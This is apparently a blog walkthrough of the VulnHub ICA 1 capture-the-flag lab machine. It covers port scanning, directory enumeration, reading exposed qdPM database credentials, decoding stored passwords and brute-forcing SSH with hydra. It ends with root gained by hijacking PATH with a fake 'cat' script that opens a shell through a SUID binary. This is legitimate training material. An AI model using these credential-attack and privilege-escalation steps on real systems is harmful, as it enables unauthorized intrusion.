vulhub ICA 1 machine walkthrough

Description

According to information from our intelligence network, ICA is working on a secret project. We need to find out what the project is. Once you have the access information, send them to us. We will place a backdoor to access the system later. You just focus on what the project is. You will probably have to go through several layers of security. The Agency has full confidence that you will successfully complete this mission. Good Luck, Agent!

Difficulty: Easy

Lab setup
First, download the vulnerable machine in ZIP format and extract that.

import the machine
Image description

Make sure both the attacker machine and the vulnerable machine are configured to use the same NAT network to allow proper communication between them.

Nmap scan
nmap -sC -sV 10.0.2.4 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0) | ssh-hostkey: | 3072 0e:77:d9:cb:f8:05:41:b9:e4:45:71:c1:01:ac:da:93 (RSA) | 256 40:51:93:4b:f8:37:85:fd:a5:f4:d7:27:41:6c:a0:a5 (ECDSA) |_ 256 09:85:60:c5:35:c1:4d:83:76:93:fb:c7:f0:cd:7b:8e (ED25519) 80/tcp open http Apache httpd 2.4.48 ((Debian)) |_http-title: qdPM | Login |_http-server-header: Apache/2.4.48 (Debian) 3306/tcp open mysql MySQL 8.0.26 | ssl-cert: Subject: commonName=MySQL_Server_8.0.26_Auto_Generated_Server_Certificate | Not valid before: 2021-09-25T10:47:29 |_Not valid after: 2031-09-23T10:47:29 |_ssl-date: TLS randomness does not represent time | mysql-info: | Protocol: 10 | Version: 8.0.26 | Thread ID: 14 | Capabilities flags: 65535 | Some Capabilities: Support41Auth, LongColumnFlag, Speaks41ProtocolNew, Speaks41ProtocolOld, FoundRows, IgnoreSpaceBeforeParenthesis, IgnoreSigpipes, LongPassword, InteractiveClient, SupportsCompression, ODBCClient, SwitchToSSLAfterHandshake, DontAllowDatabaseTableColumn, ConnectWithDatabase, SupportsTransactions, SupportsLoadDataLocal, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments | Status: Autocommit | Salt: n&"B\x06N\x02.*\x14\x01!cB\x08\x12F>\x1D/ |_ Auth Plugin Name: caching_sha2_password MAC Address: 08:00:27:CB:E5:55 (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Upon scanning the vulnerable machine, you’ll notice that the SSH, HTTP, and MySQL ports are open, indicating potential entry points for exploitation.

Directory Enumeration

For directory enumeration, I recommend using the Dirsearch tool. Its simple and easy-to-remember syntax makes it a great choice for beginners and experienced users alike

dirsearch -u 10.0.2.4 [10:02:54] 301 - 306B - /backups -> http://10.0.2.4/backups/ [10:02:54] 200 - 401B - /backups/ [10:02:57] 200 - 0B - /check.php [10:02:59] 301 - 303B - /core -> http://10.0.2.4/core/ [10:02:59] 301 - 302B - /css -> http://10.0.2.4/css/ [10:03:03] 200 - 894B - /favicon.ico [10:03:07] 301 - 305B - /images -> http://10.0.2.4/images/ [10:03:07] 200 - 635B - /images/ [10:03:07] 200 - 2KB - /index.php [10:03:07] 404 - 4KB - /index.php/login/ [10:03:07] 301 - 306B - /install -> http://10.0.2.4/install/ [10:03:08] 200 - 764B - /install/ [10:03:08] 200 - 764B - /install/index.php?upgrade/ [10:03:08] 301 - 309B - /javascript -> http://10.0.2.4/javascript/ [10:03:08] 200 - 573B - /js/ [10:03:12] 301 - 305B - /manual -> http://10.0.2.4/manual/ [10:03:12] 200 - 208B - /manual/index.html [10:03:21] 200 - 338B - /readme.txt [10:03:22] 200 - 26B - /robots.txt [10:03:23] 403 - 273B - /server-status [10:03:23] 403 - 273B - /server-status/ [10:03:27] 301 - 307B - /template -> http://10.0.2.4/template/ [10:03:28] 200 - 483B - /template/ [10:03:29] 301 - 306B - /uploads -> http://10.0.2.4/uploads/ [10:03:29] 200 - 467B - /uploads/

we can see the suspicious url

Image description

qdPM is a web-based project management tool, and in this case, we're working with version 9.2, which is known to be vulnerable.
(https://www.exploit-db.com/exploits/50176)

We discovered the database configuration details by accessing the following URL.
http://website/core/config/databases.yml

Let's connect that .
`mysql -u qdpmadmin -p -h 10.0.2.4 --ssl=0

Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 11
Server version: 8.0.26 MySQL Community Server - GPL`

The 'user' table contains a list of usernames. Let's check out the 'login' table, where we can find a list of Base64-encoded passwords. After decoding them, save the results to a password file. Since we know the SSH service is running, we can now use the discovered usernames and passwords to attempt a brute-force attack.

`hydra -L user.txt -P password.txt ssh://10.0.2.4

Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-04-16 01:32:46
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 30 login tries (l:6/p:5), ~2 tries per task
[DATA] attacking ssh://10.0.2.4:22/
[22][ssh] host: 10.0.2.4 login: travis password: DJceVy98W28Y7wLg
[22][ssh] host: 10.0.2.4 login: dexter password: 7ZwV4qtg42cmUXGX
^X1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-04-16 01:32:53 `

We successfully obtained the passwords for the 'travis' and 'dexter' accounts

connect the dexter ssh account.
Next, let's check which files have the SUID (Set User ID) bit set.
find / -type f -perm -04000 -ls 2>/dev/null -rwsr-xr-x 1 root root 16816 Sep 25 2021 /opt/get_access -rwsr-xr-x 1 root root 58416 Feb 7 2020 /usr/bin/chfn -rwsr-xr-x 1 root root 35040 Jul 28 2021 /usr/bin/umount -rwsr-xr-x 1 root root 88304 Feb 7 2020 /usr/bin/gpasswd -rwsr-xr-x 1 root root 182600 Feb 27 2021 /usr/bin/sudo -rwsr-xr-x 1 root root 63960 Feb 7 2020 /usr/bin/passwd -rwsr-xr-x 1 root root 44632 Feb 7 2020 /usr/bin/newgrp -rwsr-xr-x 1 root root 71912 Jul 28 2021 /usr/bin/su -rwsr-xr-x 1 root root 55528 Jul 28 2021 /usr/bin/mount -rwsr-xr-x 1 root root 52880 Feb 7 2020 /usr/bin/chsh -rwsr-xr-x 1 root root 481608 Mar 13 2021 /usr/lib/openssh/ssh-keysign -rwsr-xr-- 1 root messagebus 51336 Feb 21 2021 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
The 'get_access' file is not a regular file, so let's go ahead and execute it to see what happens.

`
dexter@debian:~$ /opt/get_access

############################
######## ICA #######
### ACCESS TO THE SYSTEM ###
############################

Server Information:

Firewall: AIwall v9.5.2
OS: Debian 11 "bullseye"
Network: Local Secure Network 2 (LSN2) v 2.4.1 ` All services are disabled. Accessing to the system is allowed only within working hours.

Let's examine the content of the 'get_access' binary by using the strings command to extract any readable strings.

you can see the there is suspicious binary included.

cat /root/system.info
What does it do? When we run the 'get_access' file, it reads the 'system.info' file with root privileges.

To understand how the cat command works, it’s important to know that the system searches for the cat binary in directories listed in the $PATH variable. However, if we provide a direct path to the cat binary, the system will execute it from that specific location.

Now, let’s craft a malicious cat binary in the /tmp directory and add its location to the beginning of the $PATH environment variable. This way, when the system tries to execute cat, it will run our malicious version instead.

echo -e '#!/bin/bash\n/bin/bash' > /tmp/cat chmod +x /tmp/cat export PATH=/tmp:$PATH
execute the get_access file. we successfully obtained the root access.
root@debian:/root# ls root.txt system.info
I hope you found this blog insightful and enjoyable. Thank you for reading, keep exploring and keep learning!

Comments (0)

Read More

#reading

#popular